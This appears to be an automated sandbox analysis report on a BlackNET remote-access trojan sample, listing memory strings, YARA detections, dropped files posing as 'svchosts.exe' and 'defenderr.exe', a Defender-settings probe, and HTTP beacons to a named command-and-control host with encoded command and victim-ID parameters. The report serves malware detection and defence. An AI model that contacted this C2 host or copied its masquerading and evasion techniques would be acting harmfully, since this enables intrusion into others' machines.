Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.459288061.000000001CDF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.459288061.000000001CDF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.459288061.000000001CDF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.459288061.000000001CDF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000003.375008450.000000001BCA5000.00000004.00000020.00020000.00000000.sdmp, HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.459288061.000000001CDF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.459288061.000000001CDF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.459288061.000000001CDF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.459288061.000000001CDF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.459288061.000000001CDF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000003.374945390.000000001BCA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.krFmalz
Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000003.375008450.000000001BCA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kral
Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000003.375008450.000000001BCA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kralK
Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000003.374945390.000000001BCA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kraleD
Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000003.375008450.000000001BCA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.krcomwght
Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.459288061.000000001CDF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000003.374623062.000000001BCAD000.00000004.00000020.00020000.00000000.sdmp, HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000003.374562912.000000001BCAD000.00000004.00000020.00020000.00000000.sdmp, HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000003.374577774.000000001BCAD000.00000004.00000020.00020000.00000000.sdmp, HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000003.374456004.000000001BCAD000.00000004.00000020.00020000.00000000.sdmp, HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000003.374486664.000000001BCAD000.00000004.00000020.00020000.00000000.sdmp, HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000003.374603957.000000001BCAD000.00000004.00000020.00020000.00000000.sdmp, HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000003.374670691.000000001BCAD000.00000004.00000020.00020000.00000000.sdmp, HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000003.374536462.000000001BCA9000.00000004.00000020.00020000.00000000.sdmp, HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000003.374311470.000000001BCAD000.00000004.00000020.00020000.00000000.sdmp, HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000003.374396303.000000001BCAD000.00000004.00000020.00020000.00000000.sdmp, HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000003.374359510.000000001BCAD000.00000004.00000020.00020000.00000000.sdmp, HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000003.374507617.000000001BCAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.net
Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.459288061.000000001CDF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.459288061.000000001CDF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.459288061.000000001CDF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: powershell.exe, 00000001.00000002.489596253.0000015040010000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.489596253.0000015040010000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.489596253.0000015040010000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000001.00000002.421041056.00000150301A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000003.393928679.0000015031C4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.421041056.0000015031379000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000003.393928679.0000015031DD7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000003.393928679.0000015031D25000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000003.393928679.0000015031CF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000001.00000002.489596253.0000015040010000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: unknown

DNS traffic detected: queries for: f0575824.xsph.ru

Source: global traffic	HTTP traffic detected: GET /blacknet HTTP/1.1Host: f0575824.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /blacknet/receive.php?command=VW5pbnN0YWxs&vicID=SGFjS2VkXzdGOTRDM0I1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36Host: f0575824.xsph.ru
Source: global traffic	HTTP traffic detected: GET /blacknet HTTP/1.1Host: f0575824.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /blacknet/receive.php?command=VW5pbnN0YWxs&vicID=SGFjS2VkXzdGOTRDM0I1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36Host: f0575824.xsph.ru

System Summary

Malicious sample detected (through community Yara rule)

Source: 5.2.defenderr.exe.2da0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 5.2.defenderr.exe.2da0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects BlackNET RAT Author: ditekSHen
Source: 5.2.defenderr.exe.2daa254.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 5.2.defenderr.exe.2daa254.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects BlackNET RAT Author: ditekSHen
Source: 5.2.defenderr.exe.2daa254.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 5.2.defenderr.exe.2da0000.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 5.2.defenderr.exe.2da0000.2.unpack, type: UNPACKEDPE	Matched rule: Detects BlackNET RAT Author: ditekSHen
Source: 00000005.00000002.425501198.0000000002DA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 00000005.00000002.425501198.0000000002DA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects BlackNET RAT Author: ditekSHen

Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 5.2.defenderr.exe.2da0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 5.2.defenderr.exe.2da0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_BlackNET snort2_sid = 920079-920082, author = ditekSHen, description = Detects BlackNET RAT, clamav_sig = MALWARE.Win.Trojan.BlackNET, snort3_sid = 920079-920082
Source: 5.2.defenderr.exe.2daa254.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 5.2.defenderr.exe.2daa254.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_BlackNET snort2_sid = 920079-920082, author = ditekSHen, description = Detects BlackNET RAT, clamav_sig = MALWARE.Win.Trojan.BlackNET, snort3_sid = 920079-920082
Source: 5.2.defenderr.exe.2daa254.1.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.defenderr.exe.2da0000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 5.2.defenderr.exe.2da0000.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_BlackNET snort2_sid = 920079-920082, author = ditekSHen, description = Detects BlackNET RAT, clamav_sig = MALWARE.Win.Trojan.BlackNET, snort3_sid = 920079-920082
Source: 00000005.00000002.425501198.0000000002DA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 00000005.00000002.425501198.0000000002DA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_BlackNET snort2_sid = 920079-920082, author = ditekSHen, description = Detects BlackNET RAT, clamav_sig = MALWARE.Win.Trojan.BlackNET, snort3_sid = 920079-920082

Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4196 -s 3296

Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Code function: 0_2_00007FFBAC180160	0_2_00007FFBAC180160
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Code function: 0_2_00007FFBAC18A5B6	0_2_00007FFBAC18A5B6
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Code function: 0_2_00007FFBAC18B362	0_2_00007FFBAC18B362
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Code function: 0_2_00007FFBAC18048D	0_2_00007FFBAC18048D
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Code function: 0_2_00007FFBAC1800F8	0_2_00007FFBAC1800F8
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Code function: 5_2_00007FFBAC1A048D	5_2_00007FFBAC1A048D
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Code function: 5_2_00007FFBAC1A0160	5_2_00007FFBAC1A0160
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Code function: 5_2_00007FFBAC1A00F8	5_2_00007FFBAC1A00F8
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Code function: 10_2_00007FFBAC19048D	10_2_00007FFBAC19048D
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Code function: 10_2_00007FFBAC190160	10_2_00007FFBAC190160
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Code function: 10_2_00007FFBAC1900F8	10_2_00007FFBAC1900F8
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Code function: 11_2_00007FFBAC18AD72	11_2_00007FFBAC18AD72
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Code function: 11_2_00007FFBAC189FC6	11_2_00007FFBAC189FC6
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Code function: 11_2_00007FFBAC18048D	11_2_00007FFBAC18048D
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Code function: 13_2_00007FFBAC1B048D	13_2_00007FFBAC1B048D
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Code function: 13_2_00007FFBAC1B0160	13_2_00007FFBAC1B0160
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Code function: 13_2_00007FFBAC1B00F8	13_2_00007FFBAC1B00F8

Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.431182009.0000000002AFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe
Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000000.369704577.000000000088F000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamesvchost.exel% vs HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe
Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.428762952.0000000000C8A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe
Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.431182009.0000000002E25000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesvchost.exel% vs HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe
Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 0000000A.00000002.475160530.0000000000E6C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe
Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 0000000B.00000002.528752974.0000000002F23000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe
Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 0000000B.00000002.528752974.0000000003019000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesvchost.exel% vs HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe
Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 0000000B.00000002.521974726.000000000109A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe
Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Binary or memory string: OriginalFilenamesvchost.exel% vs HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe

Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Section loaded: sbiedll.dll			Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Section loaded: sbiedll.dll

Source: Joe Sandbox View

Dropped File: C:\Users\user\Desktop\svchosts.exe AD34794058212006AE974FCC6A0242598E6D020F08044439E3512773CD402B7E

Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: defenderr.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	ReversingLabs: Detection: 48%
Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Virustotal: Detection: 52%

Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe

File read: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe:Zone.Identifier

Jump to behavior

Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" Get-MpPreference -verbose
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process created: C:\ProgramData\Microsoft\MyClient\defenderr.exe "C:\ProgramData\Microsoft\MyClient\defenderr.exe"
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4196 -s 3296
Source: unknown	Process created: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe "C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe"
Source: unknown	Process created: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe "C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe"
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process created: C:\ProgramData\Microsoft\MyClient\defenderr.exe "C:\ProgramData\Microsoft\MyClient\defenderr.exe"
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6648 -s 7384
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" Get-MpPreference -verbose	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process created: C:\ProgramData\Microsoft\MyClient\defenderr.exe "C:\ProgramData\Microsoft\MyClient\defenderr.exe"	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process created: C:\ProgramData\Microsoft\MyClient\defenderr.exe "C:\ProgramData\Microsoft\MyClient\defenderr.exe"

Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8856F961-340A-11D0-A96B-00C04FD705A2}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe

File created: C:\Users\user\Desktop\svchosts.exe

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3te1404m.s5h.ps1

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.mine.winEXE@12/17@2/2

Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WerFault.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WerFault.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6956:120:WilError_01
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4196
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Mutant created: \Sessions\1\BaseNamedObjects\BN[9a7c9bd0f370a68cb4ac77fcfeb884bd]
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6648

Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: System.Core.ni.pdbRSDSD source: WER9246.tmp.dmp.6.dr, WER43E3.tmp.dmp.14.dr
Source:	Binary string: Microsoft.VisualBasic.ni.pdb source: WER9246.tmp.dmp.6.dr, WER43E3.tmp.dmp.14.dr
Source:	Binary string: System.Xml.ni.pdb source: WER9246.tmp.dmp.6.dr, WER43E3.tmp.dmp.14.dr
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS5 source: WER9246.tmp.dmp.6.dr, WER43E3.tmp.dmp.14.dr
Source:	Binary string: System.ni.pdbRSDS source: WER9246.tmp.dmp.6.dr, WER43E3.tmp.dmp.14.dr
Source:	Binary string: System.Windows.Forms.ni.pdb source: WER9246.tmp.dmp.6.dr, WER43E3.tmp.dmp.14.dr
Source:	Binary string: System.Drawing.ni.pdb source: WER9246.tmp.dmp.6.dr, WER43E3.tmp.dmp.14.dr
Source:	Binary string: System.Management.ni.pdbRSDSJ source: WER9246.tmp.dmp.6.dr, WER43E3.tmp.dmp.14.dr
Source:	Binary string: embly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbg source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 0000000B.00000002.521974726.00000000010F8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdb source: WER9246.tmp.dmp.6.dr, WER43E3.tmp.dmp.14.dr
Source:	Binary string: System.Runtime.Remoting.pdb source: WER9246.tmp.dmp.6.dr, WER43E3.tmp.dmp.14.dr
Source:	Binary string: System.Configuration.pdb source: WER9246.tmp.dmp.6.dr, WER43E3.tmp.dmp.14.dr
Source:	Binary string: System.Drawing.ni.pdbRSDS source: WER9246.tmp.dmp.6.dr, WER43E3.tmp.dmp.14.dr
Source:	Binary string: C:\Users\mrxsh\BlackNET\WatcherService\WatcherService\obj\Release\svchost.pdb source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.431182009.0000000002E25000.00000004.00000800.00020000.00000000.sdmp, defenderr.exe, 00000005.00000002.425501198.0000000002DA0000.00000004.08000000.00040000.00000000.sdmp, HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 0000000B.00000002.528752974.0000000003019000.00000004.00000800.00020000.00000000.sdmp, svchosts.exe.0.dr
Source:	Binary string: lib.pdb.0W source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 0000000B.00000002.558054025.000000001F478000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Xml.pdb source: WER9246.tmp.dmp.6.dr, WER43E3.tmp.dmp.14.dr
Source:	Binary string: System.Runtime.Remoting.pdbMZ@ source: WER9246.tmp.dmp.6.dr, WER43E3.tmp.dmp.14.dr
Source:	Binary string: System.pdb source: WER9246.tmp.dmp.6.dr, WER43E3.tmp.dmp.14.dr
Source:	Binary string: System.Runtime.Remoting.ni.pdb source: WER9246.tmp.dmp.6.dr, WER43E3.tmp.dmp.14.dr
Source:	Binary string: 0C:\Windows\mscorlib.pdb source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.467426221.000000001F9F8000.00000004.00000010.00020000.00000000.sdmp, HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 0000000B.00000002.558054025.000000001F478000.00000004.00000010.00020000.00000000.sdmp
